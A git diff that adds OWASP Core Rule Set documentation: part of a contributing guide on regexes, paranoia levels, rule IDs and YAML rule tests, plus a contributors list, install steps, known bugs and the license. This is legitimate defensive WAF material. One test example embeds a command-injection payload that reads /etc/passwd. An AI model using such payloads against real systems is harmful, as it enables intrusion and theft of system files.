(e.g., `(?:regex)++`) +- atomic (or possessive) groups (e.g., `(?>regex`)) + +This list is not exhaustive but covers the most important points. The [RE2 documentation](https://github.com/google/re2/wiki/Syntax) includes a complete list of supported and unsupported features that various engines offer. + +### When and How to Optimize Regular Expressions + +Optimizing regular expressions is hard. 
Often, a change intended to improve the performance of a regular expression will change the original semantics by accident. In addition, optimizations usually make expressions harder to read. Consider the following example of URL schemes: + +```python +mailto|mms|mumble|maven +``` + +An optimized version (produced by the [crs-toolchain]({{< ref "crs_toolchain" >}})) could look like this: + +```python +m(?:a(?:ilto|ven)|umble|ms) +``` + +The above expression is an optimization because it reduces the number of backtracking steps when a branch fails. The regular expressions in the CRS are often comprised of lists of tens or even hundreds of words. Reading such an expression in an optimized form is difficult: even the _simple_ optimized example above is difficult to read. + +In general, contributors should not try to optimize contributed regular expressions and should instead strive for clarity. New regular expressions will usually be required to be submitted as a `.ra` file for the [crs-toolchain]({{< ref "crs_toolchain" >}}) to process. In such a file, the regular expression is decomposed into individual parts, making manual optimizations much harder or even impossible (and unnecessary with the `crs-toolchain`). The `crs-toolchain` performs some common optimizations automatically, such as the one shown above. + +Whether optimizations make sense in a contribution is assessed for each case individually. + +## Rules Compliance with Paranoia Levels + +The rules in CRS are organized into **paranoia levels** (PLs) which makes it possible to define how aggressive CRS is. See the documentation on [paranoia levels](https://coreruleset.org/docs/concepts/paranoia_levels/) for an introduction and more detailed explanation. + +Each rule that is placed into a paranoia level must contain the tag `paranoia-level/N`, where *N* is the PL value, however this tag can only be added if the rule does **not** use the nolog action. 
+ +The types of rules that are allowed at each paranoia level are as follows: + +**PL 0:** + +* ModSecurity / WAF engine installed, but almost no rules + +**PL 1:** + +* Default level: keep in mind that most installations will normally use this level +* Any complex, memory consuming evaluation rules will surely belong to a higher level, not this one +* CRS will normally use atomic checks in single rules at this level +* Confirmed matches only; all scores are allowed +* No false positives / low false positives: try to avoid adding rules with potential false positives! +* False negatives could happen + +**PL 2:** + +* [Chain](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-%28v2.x%29#chain) usage is allowed +* Confirmed matches use score critical +* Matches that cause false positives are limited to using scores notice or warning +* Low false positive rates +* False negatives are not desirable + +**PL 3:** + +* Chain usage with complex regular expression look arounds and macro expansions are allowed +* Confirmed matches use scores warning or critical +* Matches that cause false positives are limited to using score notice +* False positive rates are higher but limited to multiple matches (not single strings) +* False negatives should be a very unlikely accident + +**PL 4:** + +* Every item is inspected +* Variable creations are allowed to avoid engine limitations +* Confirmed matches use scores notice, warning, or critical +* Matches that cause false positives are limited to using scores notice or warning +* False positive rates are higher (even on single strings) +* False negatives should not happen at this level +* Check everything against RFCs and allow listed values for the most popular elements + +## ID Numbering Scheme + +The CRS project uses the numerical ID rule namespace from 900,000 to 999,999 for CRS rules, as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages and plugins. 
+ +- Rules applying to the **incoming request** use the ID range 900,000 to 949,999. +- Rules applying to the **outgoing response** use the ID range 950,000 to 999,999. + +The rules are grouped by the vulnerability class they address (SQLi, RCE, etc.) or the functionality they provide (e.g., initialization). These groups occupy blocks of thousands (e.g., SQLi: 942,000 - 942,999). These grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule IDs defined within the file (e.g., SQLi: `REQUEST-942-APPLICATION-ATTACK-SQLI.conf`). + +The individual rules within each file for a vulnerability class are organized by the paranoia level of the rules. PL 1 is first, then PL 2, etc. + +The ID block 9xx000 - 9xx099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block. + +Among the rules providing CRS helper functionality are rules that skip other rules depending on the paranoia level. These rules always use the following reserved rule IDs: 9xx011 - 9xx018, with very few exceptions. + +The blocking and filter rules start at 9xx100 with a step width of 10, e.g., 9xx100, 9xx110, 9xx120, etc. + +The ID of a rule does not correspond directly with its paranoia level. Given the size of rule groups and how they're organized by paranoia level (starting with the lower PL rules first), PL 2 and above tend to be composed of rules with higher ID numbers. + +### Stricter Siblings + +Within a rule file / block, there are sometimes smaller groups of rules that belong together. They're closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different *target* in a second rule, where this is necessary). These are **stricter siblings** of the base rule. 
Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one, e.g., a base rule at 9xx160 and a stricter sibling at 9xx161. + +Stricter siblings often have different paranoia levels. This means that the base rule and the stricter siblings don't usually reside next to each another in the rule file. Instead, they're ordered by paranoia level and are linked by the first digits of their rule IDs. It's good practice to introduce all stricter siblings together as part of the definition of the base rule: this can be done in the comments of the base rule. It's also good practice to refer back to the base rule with the keywords "stricter sibling" in the comments of the stricter siblings themselves. For example: "...This is performed in two separate stricter siblings of this rule: 9xxxx1 and 9xxxx2", and "This is a stricter sibling of rule 9xxxx0." + +## Writing Tests + +Each rule should be accompanied by tests. Rule tests are an invaluable way to check that a rule behaves as expected: + +- Does the rule correctly match against the payloads and behaviors that the rule is designed to detect? (**Positive tests**) +- Does the rule correctly **not** match against legitimate requests, i.e., the rule doesn't cause obvious false positives? (**Negative tests**) + +Rule tests also provide an excellent way to test WAF engines and implementations to ensure they behave and execute CRS rules as expected. + +The rule tests are located under `tests/regression/tests`. Each CRS rule *file* has a corresponding *directory* and each individual *rule* has a corresponding *YAML file* containing all the tests for that rule. For example, the tests for rule 911100 *(Method is not allowed by policy)* are in the file `REQUEST-911-METHOD-ENFORCEMENT/911100.yaml`. + +Full documentation of the required formatting and available options of the YAML tests can be found at https://github.com/coreruleset/ftw/blob/main/docs/YAMLFormat.md. 
+ +Documentation on how to run the CRS test suite can be found in the [online documentation](https://coreruleset.org/docs/development/testing/). + +### Positive Tests + +Example of a simple *positive test*: + +```yaml +- test_title: 932230-26 + desc: "Unix command injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log_contains: id "932230" +``` + +This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. + +It's important that tests consistently include the HTTP header fields `Host`, `User-Agent`, and `Accept`. CRS includes rules that detect if these headers are missing or empty, so these headers should be included in each test to avoid unnecessarily causing those rules to match. Ideally, *each positive test should cause* **only** *the rule in question to match*. + +The rule's description field, `desc`, is important. It should describe what is being tested: what *should* match, what should *not* match, etc. + +### Negative Tests + +Example of a simple *negative test*: + +```yaml +- test_title: 932260-4 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: '/post' + output: + no_log_contains: id "932260" +``` + +This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. 
+ +### Encoded and Raw Requests + +It is possible to *encode* an entire test request. This encapsulates the request and means that the request headers and payload don't need to be explicitly declared. This is useful when a test request needs to use unusual bytes which might break YAML parsers, or when a test request must be intentionally malformed in a way that is impossible to describe otherwise. An encoded request is sent exactly as intended. + +The `encoded_request` field works like so: + +```yaml +encoded_request: +``` + +For example: +```yaml +encoded_request: "R0VUIFwgSFRUUA0KDQoK" +``` + +where `R0VUIFwgSFRUUA0KDQoK` is the base64-encoded equivalent of `GET \ HTTP\r\n\r\n`. + +The older method of using `raw_request` is deprecated as it's difficult to maintain and less portable than `encoded_request`. + +### Using The Correct HTTP Endpoint + +The CRS project uses [kennthreitz/httpbin](https://hub.docker.com/r/kennethreitz/httpbin) as the backend server for tests. This backend provides one dedicated endpoint for each HTTP method. Tests should target these endpoints to: + +- improve test throughput (prevent HTML from being returned by the backend) +- add automatic HTTP method verification (the backend will respond with status code `405` (method not allowed) to requests whose method does not match the endpoint) + +Test URIs should be structured as follows, where `` must be replaced by the name of the HTTP method the test uses: + +```yaml +#... + method: + uri: //some/arbitrary/url +#... +``` + +## Further Guidance on Rule Writing + +### Leaving Audit Log Configuration Unchanged + +Former versions of CRS dynamically included the HTTP response body in the audit log via special `ctl` statements on certain individual response rules. This was never applied in a systematic way and, regardless, CRS should not change the format of the audit log by itself, namely because this can lead to information leakages. 
Therefore, the use of `ctl:auditLogParts=+E` or any other form of `ctl:auditLogParts` is not allowed in CRS rules. + +## Non-Rules General Guidelines + +* Remove trailing spaces from files (if they're not needed). This will make linters happy. +* EOF should have an EOL. + +The `pre-commit` framework can be used to check for and fix these issues automatically. First, go to the [pre-commit](https://pre-commit.com/) website and download the framework. Then, after installing, use the command `pre-commit install` so that the tools are installed and run each time a commit is made. CRS provides a config file that will keep the repository clean. diff --git a/nginx/config/owasp-crs/CONTRIBUTORS.md b/nginx/config/owasp-crs/CONTRIBUTORS.md new file mode 100644 index 00000000..28f86dfb --- /dev/null +++ b/nginx/config/owasp-crs/CONTRIBUTORS.md 
@@ -0,0 +1,143 @@
+# Contributors
+
+## Project Co-Leads:
+
+- [Christian Folini](https://github.com/dune73)
+- [Walter Hop](https://github.com/lifeforms)
+- [Felipe Zipitría](https://github.com/fzipi)
+
+## Developers:
+
+- [Paul Beckett](https://github.com/53cur3M3)
+- [Franziska Bühler](https://github.com/franbuehler)
+- [Christoph Hansen](https://github.com/emphazer)
+- [Ervin Hegedus](https://github.com/airween)
+- [Andrew Howe](https://github.com/RedXanadu)
+- [Karel Knibbe](https://github.com/karelorigin)
+- [Max Leske](https://github.com/theseion)
+- [Andrea Menin](https://github.com/theMiddleBlue)
+- [Matteo Pace](https://github.com/M4tteoP)
+- [Jitendra Patro](https://github.com/Xhoenix)
+- [Chaim Sanders](https://github.com/csanders-git)
+- [Federico G. Schwindt](https://github.com/fgsch)
+- [Manuel Leos Rivas](https://github.com/spartantri)
+- [Simon Studer](https://github.com/studersi)
+- [Jozef Sudolský](https://github.com/azurit)
+
+## Contributors:
+
+- [agusmu](https://github.com/agusmu)
+- [Amir Hosein Aliakbarian](https://github.com/AmirHoseinAliakbarian)
+- [Zack Allen](https://github.com/zmallen)
+- [azhao155](https://github.com/azhao155)
+- [Matt Bagley](https://github.com/bagley)
+- [Ryan Barnett](https://github.com/rcbarnett)
+- [Soufiane Benali](https://github.com/soufianebenali)
+- [Peter Bittner](https://github.com/bittner)
+- [Allan Boll](https://github.com/allanbomsft)
+- [Jeremy Brown](https://github.com/jwbrown77)
+- [Esad Cetiner](https://github.com/esadcetiner/)
+- [Brent Clark](https://github.com/brentclark)
+- [Jonathan Claudius](https://github.com/claudijd)
+- [coolt](https://github.com/coolt)
+- [Hussein Daher](https://github.com/hussein98d)
+- [Abu Dawud](https://github.com/abudawud)
+- [Ashish Dixit](https://github.com/tundal45)
+- [Mirko Dziadzka](https://github.com/mirkodziadzka-avi)
+- [Padraig Doran](https://github.com/padraigdoran)
+- [Dan Ehrlich](https://github.com/danehrlich1)
+- [İlteriş Eroğlu](https://github.com/linuxgemini)
+- [Umar Farook](https://github.com/umarfarook882)
+- [flo405](https://github.com/flo405)
+- [Fregf](https://github.com/Fregf)
+- [FrozenSolid](https://github.com/frozenSolid)
+- [Pásztor Gábor](https://github.com/gpasztor87)
+- [Jan Gora](https://github.com/terjanq)
+- [Aaron Haaf](https://github.com/Everspace)
+- [Michael Haas](https://github.com/MichaelHaas)
+- [henkworks](https://github.com/henkworks)
+- [Tim Herren](https://github.com/nerrehmit)
+- [Victor Hora](https://github.com/victorhora)
+- [itsTheFae](https://github.com/itsTheFae)
+- [jamuse](https://github.com/jamuse)
+- [jeremyjpj0916](https://github.com/jeremyjpj0916)
+- [jschleus](https://github.com/jschleus)
+- [k4n5ha0](https://github.com/k4n5ha0)
+- [kam821](https://github.com/kam821)
+- [Katherine](https://github.com/katef)
+- [kyzentun](https://github.com/kyzentun)
+- [Joost de Keijzer](https://github.com/joostdekeijzer)
+- [Krzysztof Kotowicz](https://github.com/koto)
+- [Evgeny Marmalstein](https://github.com/shimshon70)
+- [meetug](https://github.com/meetug)
+- [Christian Mehlmauer](https://github.com/FireFart)
+- [Pinaki Mondal](https://github.com/0xinfection)
+- [Glyn Mooney](https://github.com/skidoosh)
+- [na1ex](https://github.com/na1ex)
+- [Jose Nazario](https://github.com/paralax)
+- [Scott O'Neil](https://github.com/cPanelScott)
+- [NiceYouKnow](https://github.com/NiceYouKnow)
+- [nobletrout](https://github.com/nobletrout)
+- [Fernando Outeda](https://github.com/fog94)
+- [NullIsNot0](https://github.com/NullIsNot0)
+- [Robert Paprocki](https://github.com/p0pr0ck5)
+- [Christian Peron](https://github.com/csjperon)
+- [Elia Pinto](https://github.com/yersinia)
+- [pyllyukko](https://github.com/pyllyukko)
+- [Brian Rectanus](https://github.com/b1v1r)
+- [Vandan Rohatgi](https://github.com/vandanrohatgi)
+- [Rufus125](https://github.com/Rufus125)
+- Ofer Shezaf
+- [Takaya Saeki](https://github.com/nullpo-head)
+- Breno Silva
+- [Deepshikha Sinha](https://github.com/deepshikha-s)
+- siric\_
+- Emile-Hugo Spir
+- [somechris](https://github.com/somechris)
+- [Marc Stern](https://github.com/marcstern)
+- [supplient](https://github.com/supplient)
+- [Mike Taylor](https://github.com/miketaylr)
+- [ThanhPT](https://github.com/nevol1708)
+- [Timo](https://github.com/ntimo)
+- [Juan-Pablo Tosso](https://github.com/jptosso)
+- [vijayasija99](https://github.com/vijayasija99)
+- [Ben Williams](https://github.com/benwilliams)
+- [Anna Winkler](https://github.com/annawinkler)
+- [Avery Wong](https://github.com/4v3r9)
+- [Will Woodson](https://github.com/wjwoodson)
+- [Greg Wroblewski](https://github.com/gwroblew)
+- [XeroChen](https://github.com/XeroChen)
+- [ygrek](https://github.com/ygrek)
+- [Yu Yagihashi](https://github.com/yagihash)
+- [Felipe "Zimmerle" Costa](https://github.com/zimmerle)
+- [Zino](https://github.com/zinoe)
+- Josh Zlatin
+- [Zou Guangxian](https://github.com/zouguangxian)
+- [4ft35t](https://github.com/4ft35t)
+- [Andy Clapson](https://github.com/Homesteady)
+- [Anuraag Agrawal](https://github.com/anuraaga)
+- [Christian Aistleitner](https://github.com/somechris)
+- [Dennis Brown](https://github.com/MutableLoss)
+- [Dexter Chang](https://github.com/dextermallo)
+- [Esa Jokinen](https://github.com/oh2fih)
+- [Finn Westendorf](https://github.com/wfinn)
+- [Gwendal Le Coguic](https://github.com/gwen001)
+- [Jean-François Viguier](https://github.com/jf-viguier)
+- [Juan Pablo Tosso](https://github.com/jptosso)
+- [Karel](https://github.com/karelorigin)
+- [Khiem Doan](https://github.com/khiemdoan)
+- [Mark Zeman](https://github.com/KramNamez)
+- [Priyam Patel](https://github.com/priyam001)
+- [Robert DeBoer](https://github.com/robertdeboer)
+- [Somdev Sangwan](https://github.com/s0md3v)
+- [Stephen Sigwart](https://github.com/ssigwart)
+- [Zerorigin](https://github.com/Zerorigin)
+- [Syin Wu](https://github.com/bxlxx)
+- [henkdswiss](https://github.com/henkworks)
+- [ignatiev](https://github.com/ignatiev)
+- [oct0pus7](https://github.com/oct0pus7)
+- [Timo](https://github.com/ntimo)
+- [rekter0](https://github.com/rekter0)
+- [ThanhPT](https://github.com/thanhpt1708)
+- [Vandan Rohatgi](https://github.com/vandanrohatgi)
+- [NiceYouKnow](https://github.com/NiceYouKnow)
diff --git a/nginx/config/owasp-crs/INSTALL b/nginx/config/owasp-crs/INSTALL
new file mode 100644
index 00000000..052543fd
--- /dev/null
+++ b/nginx/config/owasp-crs/INSTALL
@@ -0,0 +1,273 @@ + _____ _____ _____ ____ + / ____| __ \ / ____| |___ \ + | | | |__) | (___ __) | + | | | _ / \___ \ |__ < + | |____| | \ \ ____) | ___) | + \_____|_| \_\_____/ |____/ + + OWASP Core Rule Set 3.x + +Installing ModSecurity +===================== + + This document does NOT detail how to install ModSecurity. Rather, + only information pertaining to the installation of the OWASP Core + Rule Set (CRS) is provided. However, ModSecurity is a prerequisite + for the CRS installation. Information on installing ModSecurity + can be found within the ModSecurity project at + https://github.com/SpiderLabs/ModSecurity or at ModSecurity.org. + +Installing From a Package Manager +================================= + + The OWASP Core Rule Set (CRS) is available from many sources. On + multiple platforms this includes package managers. These packages are + maintained by independent packagers who package CRS in their own time. + Historically, many of these packages have been out of date. As such, + it is recommended that you install, where possible, from our GitHub + repository. The following CRS 3.x packages are known to exist: + + modsecurity-crs - Debian + mod_security_crs - Fedora + modsecurity-crs - Gentoo + + Packages of CRS 2.x are incompatible with CRS 3.x. + +Installing +========== + + You can download a copy of the CRS from the following URL: + https://coreruleset.org/installation/ + + Our release zip/tar.gz files are the preferred way to install CRS. + + However, if you want to follow rule development closely and get + the newest protections quickly, you can also clone our GitHub + repository to get the current work-in-progress for the next release. + +Prerequisites +------------- + + CRS is designed to be used with ModSecurity (although many other + projects also use the provided rules). CRS version 3.x is designed for + ModSecurity 2.8 or above. CRS version 3.x makes use of libinjection + and libXML2. 
Failure to provide these prerequisites may result in + serious false negatives and CRS version 3.x should NOT be run without + these. Note, however, that libinjection is bundled with ModSecurity + since version 2.8. Additionally, if you are downloading from the + GitHub repo you will need to install 'git' on your system. + +Upgrading from CRS 2.x +---------------------- + CRS 3.x is a major release incompatible with CRS 2.x. + The rule IDs have changed. The file id_renumbering/IdNumbering.csv + contains a list with old and new rule IDs. However, a key feature + of the release 3.x is the reduction of false positives in the + default installation and we recommend you start with a fresh + install from scratch. + Key parameter variables have changed their name and new features + have been introduced. Your former modsecurity_crs_10_setup.conf + file is thus no longer usable. + We recommend you to start with a fresh install from scratch. + +Installing on Apache +-------------------- + 1. Install ModSecurity for Apache + 2. Ensure that ModSecurity is loading correctly by checking error.log + at start up for lines indicating ModSecurity is installed. An example + might appear as follows: + ```ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/) configured.``` + 3. The most common method of deploying ModSecurity we have seen is + to create a new folder underneath the Apache directory (typically + /usr/local/apache/, /etc/httpd/, or /etc/apache2). Often this folder + is called 'modsecurity.d'. Create this folder and cd into it. + 4. Download our release from https://coreruleset.org/installation/ + and unpack it into a new owasp-modsecurity-crs folder. + 5. Move the crs-setup.conf.example file to crs-setup.conf. + Please take the time to go through this file and customize the settings + for your local environment. Failure to do so may result in false + negatives and false positives. See the section entitled OWASP CRS + Configuration for more detail. + 6. 
Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exclusions without updates + overwriting them in the future. + 7. Add the following lines to your httpd.conf/apache2.conf (the following + assumes you've put CRS into modsecurity.d/owasp-modsecurity-crs). You + can alternatively place these in any config file included by Apache: + ``` + + Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf + IncludeOptional modsecurity.d/owasp-modsecurity-crs/plugins/*-config.conf + IncludeOptional modsecurity.d/owasp-modsecurity-crs/plugins/*-before.conf + Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf + IncludeOptional modsecurity.d/owasp-modsecurity-crs/plugins/*-after.conf + + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on Nginx +------------------- + 1. Compile ModSecurity into Nginx + 2. Ensure that ModSecurity is loading correctly by checking error.log + at start up for lines indicating ModSecurity is installed. An example + might appear as follows: + ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` + 3. The most common method of deploying ModSecurity we have seen is + to create a new folder underneath the Nginx directory (typically + /usr/local/nginx/conf/). Often this folder + is called 'owasp-modsecurity-crs'. Create this folder and cd into it. + 4. Download our release from https://coreruleset.org/installation/ + and unpack it into a new owasp-modsecurity-crs folder. + 5. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. 
See the + section entitled OWASP CRS Configuration for more detail. + 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 7. Nginx requires the configuration of a single ModSecurity + configuration file within the nginx.conf file using the + 'ModSecurityConfig' directive (when using ModSecurity 2.x). + Best practice is to set 'ModSecurityConfig' to a file from + which you will include your other ModSecurity configuration + files. In this example we will use: + ```ModSecurityConfig modsec_includes.conf;``` + 7. Within modsec_includes.conf create your includes to the + CRS folder similar to as follows (The modsecurity.conf file from the + ModSecurity installation is included in this example): + ``` + Include modsecurity.conf + Include owasp-modsecurity-crs/crs-setup.conf + Include owasp-modsecurity-crs/plugins/*-config.conf + Include owasp-modsecurity-crs/plugins/*-before.conf + Include owasp-modsecurity-crs/rules/*.conf + Include owasp-modsecurity-crs/plugins/*-after.conf + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on IIS +----------------- + The IIS installer comes with an optional version of CRS built in. + To upgrade or install this after the fact follow the following + steps. + 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" + 2. Download our release from https://coreruleset.org/installation/ + and unpack it into the current folder. + 3. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. 
See the + section entitled OWASP CRS Configuration for more detail. + 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 5. Navigate back to the 'ModSecurity IIS' folder and modify the + 'modsecurity_iis' to include the following: + ``` + Include owasp-modsecurity-crs/crs-setup.conf + Include owasp-modsecurity-crs/plugins/*-config.conf + Include owasp-modsecurity-crs/plugins/*-before.conf + Include owasp-modsecurity-crs/rules/*.conf + Include owasp-modsecurity-crs/plugins/*-after.conf + ``` + 6. Restart web server and ensure it starts without errors + 7. Make sure your web sites are still running fine. + 8. Proceed to the section "Testing the Installation" below. + +Testing the Installation +======================== + To test your installation you should be able to use any number + of attacks. A typical request which should trigger CRS would be + ```http://localhost/?param=">``` + Upon sending this request you should see events reported in the + error log (nginx apache) or the event viewer (IIS). + + If have not changed the defaults with regards to anomaly scoring, + blocking and sampling percentage, then this request should have + been blocked and access forbidden. Likewise if you have configured + ModSecurity debug logging and/or audit logging this event should + log to these locations as well. + +OWASP CRS Configuration +======================= + The crs-setup.conf file includes management rules + and directives that can control important CRS functions. + The crs-setup.conf file comes with extensive comments. + This section here brings only the essential parts. + + By default we do not include settings within the crs-setup.conf + that configure ModSecurity itself. Instead those configuration + settings are set during the installation of ModSecurity proper. 
+ An example for such such a + configuration file is available via the ModSecurity project + (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). + Be aware the crs-setup.conf file DOES specify + configuration directives such as SecDefaultAction. The default + is the anomaly scoring mode with the appropriate + SecDefaultAction as defined in the crs-setup.conf. + Alternative configuration modes are supported and explained + in crs-setup.conf. + + The default anomaly/correlation mode establishes an inbound + anomaly score threshold of 5 and an outbound anomaly score + threshold of 4. The default installation has been tuned to + reduce false positives in a way that will allow most requests + to pass in this default setup. + + However, testing the setup and tuning false positives + before going to production is vital. This is especially true + if you raise the paranoia level with is set to 1 by default. + Higher paranoia levels ranging from 2 to 4 include more + aggressive rules which will raise additional false positives + but also raise the security level of your service. + + If you are unsure about the performance impact of the CRS + or if you are unsure about the number of false positives, then + you may want to use the sampling percentage. This number, + which is set to 100 by default, controls the percentage + of requests which is funneled into the CRS. Fresh installs + on high traffic sites are advised to start with a low, or + very low number of percentages and raise the number + slowly up to 100. Be aware that any number below 100 allows + a random number of requests to bypass the ruleset completely. + + Update the TX policy settings for allowed Request Methods, File + Extensions, maximum numbers of arguments, etc to better reflect + your environment that is being protected. + + Make sure your GeoIP and Project Honeypot settings are specified + if you are using them. + The GeoIP database is no longer included with the CRS. 
Instead + you are advised to download it regularly. + + The use of Project Honeypot requires a + free API key. These require an account but can be obtained at + https://www.projecthoneypot.org/httpbl_configure.php. + + Be sure to check out the other settings present within the + crs-setup.conf file. There are many other options that have to + do with aspects of web application security that are beyond + this document but are well explained in crs-setup.conf. + +OWASP CRS Plugins +================= + Plugins are a way to enhance the CRS rule set with additional + official and also 3rd party rules that integrate with the standard + CRS. + + Plugins are more free in what they do and in the dependencies that + they bring. So we allow plugins to do things that standard CRS + rules are not allowed to do etc. + + Plugins are installed by copying them into the CRS plugins folder. + + A repository with a list of official and 3rd party plugins can be + found at https://github.com/coreruleset/plugin-registry. diff --git a/nginx/config/owasp-crs/KNOWN_BUGS.md b/nginx/config/owasp-crs/KNOWN_BUGS.md new file mode 100644 index 00000000..8984456f --- /dev/null +++ b/nginx/config/owasp-crs/KNOWN_BUGS.md 
@@ -0,0 +1,49 @@
+# CRS KNOWN BUGS
+
+## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist
+
+* https://github.com/coreruleset/coreruleset/issues
+or the CRS Google Group at
+* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project
+
+* There are still false positives for standard web applications in
+ the default install (paranoia level 1). Please report these when
+ you encounter them.
+ False Positives from paranoia level 2 rules are less interesting,
+ as we expect users to write exclusion rules for their alerts in
+ the higher paranoia levels.
+* Permanent blocking of clients is based on a previous user agent / IP
+ combination. Changing the user agent will thus allow to bypass
+ this new filter. The plan is to allow for a purely IP based
+ filter in the future.
+* Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line
+ configuration directives, which causes Apache to fail during startup
+ with an error such as:
+ Error parsing actions: Unknown action: \\
+ Action 'configtest' failed.
+ This bug is known to plague RHEL/Centos 7 below v7.4 or
+ httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users.
+ https://bz.apache.org/bugzilla/show_bug.cgi?id=55910
+ We advise to upgrade your Apache version. If upgrading is not possible,
+ we have provided a script in the util/join-multiline-rules directory
+ which converts the rules into a format that works around the bug.
+ You have to re-run this script whenever you modify or update
+ the CRS rules.
+* Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity,
+ which causes the following error in the Apache ErrorLog or SecAuditLog:
+ 'ModSecurity: JSON support was not enabled.'
+ JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014).
+ You can either use backports.debian.org to install the latest ModSecurity
+ release or disable rule id 200001.
+* As of CRS version 3.0.1, support has been added for the application/soap+xml MIME
+ type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is
+ indicative that XML will be provided. In accordance with this, ModSecurity's XML
+ Request Body Processor should also be configured to support this MIME type. Within
+ the ModSecurity project, [commit 5e4e2af](https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e)
+ has been merged to support this endeavour. However, if you are running a modified or
+ preexisting version of the modsecurity.conf provided by this repository, you may
+ wish to upgrade rule '200000' accordingly. The rule now appears as follows:
+ ```
+ SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \
+ "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML"
+ ```
diff --git a/nginx/config/owasp-crs/LICENSE b/nginx/config/owasp-crs/LICENSE
new file mode 100644
index 00000000..3a3da2f5
--- /dev/null
+++ b/nginx/config/owasp-crs/LICENSE
@@ -0,0 +1,201 @@
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. 
For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
